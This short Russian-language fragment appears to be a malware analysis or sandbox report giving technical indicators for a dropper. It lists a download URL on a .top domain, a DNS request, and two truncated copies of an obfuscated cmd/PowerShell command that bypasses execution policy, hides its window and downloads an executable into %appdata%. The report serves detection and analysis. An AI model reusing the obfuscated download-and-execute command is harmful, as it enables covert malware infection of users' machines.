Техническая информация
- http://newyeargoka.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POwEr^S^he^L^l.^ExE -^eXe^cu^TI^o^n^Po^li^cY b^Y^PAsS -n^OpROfilE ^-WindOWST^YLE h^i^d^dEn^ ^(N^e^W^-O^b^jE^CT sYStE^M.neT.^W^eB^CLiEnT^).^d^Ow^NLO^A^dFIL^E('http://newyeargoka....
- DNS ASK ne###argoka.top
- '<SYSTEM32>\cmd.exe' /C "POwEr^S^he^L^l.^ExE -^eXe^cu^TI^o^n^Po^li^cY b^Y^PAsS -n^OpROfilE ^-WindOWST^YLE h^i^d^dEn^ ^(N^e^W^-O^b^jE^CT sYStE^M.neT.^W^eB^CLiEnT^).^d^Ow^NLO^A^dFIL^E('http://newyeargoka....' (со скрытым окном)